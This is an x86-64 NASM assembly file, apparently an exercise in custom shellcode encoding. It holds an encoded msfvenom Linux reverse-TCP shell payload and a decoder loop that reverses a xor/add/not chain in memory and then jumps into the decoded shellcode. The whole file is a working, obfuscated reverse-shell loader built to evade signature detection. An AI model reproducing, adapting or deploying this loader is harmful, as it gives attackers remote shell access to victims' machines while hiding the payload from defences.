xanax-decoder.nasm

global _start

section .text

keys.xor1 equ 0x29
keys.add1 equ 0xff
keys.xor2 equ 0x50
keys.add2 equ 0x05

; xanax encoded payload
payload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes

_start:

    jmp encode_setup
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    payload_start: db 0x92 ,0x55 ,0xc4 ,0x05 ,0x92 ,0x8a ,0xdf ,0x92 ,0x8d ,0xde ,0x8f ,0x89 ,0xf4 ,0x17 ,0xf4 ,0x25 ,0x8a ,0x8c ,0x9d ,0xc0 ,0x4c ,0xd4 ,0x8c ,0x88 ,0xdd ,0xf4 ,0x35 ,0x66 ,0x92 ,0x9c ,0xc2 ,0x92 ,0x52 ,0xc4 ,0x8f ,0x89 ,0x92 ,0x8b ,0xde ,0xf4 ,0x7f ,0x4e ,0x92 ,0xad ,0xc4 ,0x8f ,0x89 ,0xf9 ,0x76 ,0x92 ,0xa3 ,0xc4 ,0x05 ,0xf4 ,0x23 ,0xaf ,0xea ,0x95 ,0xee ,0xaf ,0xfb ,0x94 ,0x8c ,0xdb ,0xf4 ,0x35 ,0x67 ,0xda ,0xd7 ,0xf4 ,0x35 ,0x66 ,0x8f ,0x89
    
    encode_setup:
    xor rcx, rcx
    lea rsi, [rel payload_start]
    encode:    
        mov al, byte [rsi+rcx]
        ; XANAX encoding (xor add neg add xor)
        xor al, keys.xor2
        sub al, keys.add2
        not al
        sub al, keys.add1
        xor al, keys.xor1

        mov byte [rsi+rcx], al

        inc rcx
        cmp rcx, payload.len
        jne encode

    ; Execute payload
    jmp rsi